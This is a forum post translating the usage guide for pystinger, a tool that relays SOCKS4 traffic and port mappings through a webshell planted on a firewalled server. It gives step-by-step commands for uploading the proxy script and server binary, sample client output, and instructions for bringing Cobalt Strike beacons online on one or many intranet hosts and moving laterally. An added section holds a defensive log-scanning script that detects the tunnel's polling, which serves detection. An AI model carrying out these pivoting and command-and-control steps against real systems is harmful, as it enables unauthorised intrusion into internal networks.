Security Matrix (安全矩阵) forum

Views: 2353 | Replies: 0

Pystinger - Using a Webshell to Bypass Firewalls for Traffic Forwarding

Posted on 2021-5-10 21:53:31
Original link: Pystinger - Using a Webshell to Bypass Firewalls for Traffic Forwarding

pystinger implements an intranet SOCKS4 proxy and port mapping through a webshell, and can be used directly to bring hosts online in metasploit-framework, viper, and cobalt strike.


The main body is developed in Python; php, jsp(x), and aspx proxy scripts are currently supported.

Assume the target server has no outbound internet access, is reachable at http://example.com:8080, and has the intranet IP address 192.168.3.11.

1. SOCKS4 proxy
  • Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is accessible and the page returns UTF-8
  • Upload stinger_server.exe to the target server and start the server side by executing start D:/XXX/stinger_server.exe from AntSword (蚁剑) / Behinder (冰蝎)

Do not run D:/XXX/stinger_server.exe directly; doing so causes the TCP connection to drop
  • On the VPS, execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • The following output indicates success
    root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
    2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
    2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
    2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
    2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
    2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
    2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
    2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
    2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
    2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
    2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
    2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
    2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
    2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
    2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
    2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
    2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
    2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
    2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
    2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
    2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
    2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
    2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
    2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

  • At this point a socks4a proxy into the intranet where example.com sits is listening on the VPS at 127.0.0.1:60000

  • At this point the target server's 127.0.0.1:60020 has been mapped to the VPS's 127.0.0.1:60020

2. cobalt strike single-host check-in
  • Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is accessible and the page returns UTF-8
  • Upload stinger_server.exe to the target server and start the server side by executing start D:/XXX/stinger_server.exe from AntSword (蚁剑) / Behinder (冰蝎)

Do not run D:/XXX/stinger_server.exe directly; doing so causes the TCP connection to drop
  • On the stinger_client command line, execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • The same output as in section 1 indicates success

  • In cobalt strike, add a listener; for the port choose the Handler/LISTEN port shown under RAT Config in the output (usually 60020), and set beacons to 127.0.0.1

  • Generate the payload, upload it to the host and run it; the host then checks in

3. cobalt strike multi-host check-in
  • Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is accessible and the page returns UTF-8
  • Upload stinger_server.exe to the target server and start the server side by executing start D:/XXX/stinger_server.exe 192.168.3.11 from AntSword (蚁剑) / Behinder (冰蝎)

192.168.3.11 can be changed to 0.0.0.0
  • On the stinger_client command line, execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • The following output indicates success
    root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
    2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
    2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
    2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
    2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
    2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
    2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
    2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
    2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
    2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
    2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
    2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
    2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
    2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
    2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
    2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
    2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
    2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
    2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
    2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
    2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
    2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
    2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
    2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

  • In cobalt strike, add a listener; for the port choose the Handler/LISTEN port shown under RAT Config (usually 60020), and set beacons to 192.168.3.11 (the intranet IP address of example.com)
  • Generate the payload, upload it to the host and run it; the host then checks in
  • When moving laterally to other hosts, point the payload at 192.168.3.11:60020 and those hosts check in through the same egress
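As an added defender-side example (not part of the original post or of the pystinger project): the relay described in sections 1 to 3 only works because the client keeps hammering one script page with small POST requests (SLEEP_TIME 0.01 in the output above), so the pattern stands out in the web server's access log. The script below looks for that pattern in combined-log-format lines; the log entries, IPs and thresholds are constructed assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined-log-format access line (Apache/Tomcat style); the sample data below is constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
SCRIPT_EXT = (".jsp", ".jspx", ".php", ".aspx")   # extensions of the proxy scripts the page lists

def parse_line(line):
    """Return (ip, timestamp, method, path, status, size), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"]), 0 if m["size"] == "-" else int(m["size"])

def find_tunnel_polling(lines, window=10, min_hits=20):
    """Flag (ip, path, hits) where one client POSTs to one script page at least min_hits
    times inside any `window` seconds. A socks-over-webshell relay must poll like this;
    ordinary browsing of a .jsp/.php/.aspx page never does."""
    by_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].lower().endswith(SCRIPT_EXT):
            by_key[(rec[0], rec[3])].append(rec[1])
    findings = []
    for (ip, path), stamps in by_key.items():
        stamps.sort()
        best = start = 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while (stamps[end] - stamps[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            findings.append((ip, path, best))
    return findings

# Constructed sample: 25 rapid POSTs to proxy.jsp from one client, plus ordinary browsing noise.
SAMPLE = [
    f'203.0.113.5 - - [06/Jan/2020:21:12:{47 + i // 10:02d} +0800] "POST /proxy.jsp HTTP/1.1" 200 64'
    for i in range(25)
] + [
    '198.51.100.7 - - [06/Jan/2020:21:12:48 +0800] "GET /index.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Jan/2020:21:12:49 +0800] "POST /login.jsp HTTP/1.1" 302 -',
]
```

Running find_tunnel_polling(SAMPLE) flags only the 203.0.113.5 -> /proxy.jsp burst; pair it with a host-side check for a process listening on the SERVER_LISTEN port (60010 above) that was spawned by the web server's worker process.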

4. Custom headers and proxy
  • If the webshell requires a Cookie or Authorization header, configure request headers with the --header parameter

--header "Authorization: XXXXXX,Cookie: XXXXX"
  • If the webshell must be reached through a proxy, set it with --proxy

--proxy "socks5:127.0.0.1:1081"

stinger_server\stinger_client
  • windows
  • linux

proxy.jsp(x)/php/aspx
  • php7.2
  • tomcat7.0
  • iis8.0


Project page:
https://github.com/FunnyWolf/pystinger/releases/tag/v1.6
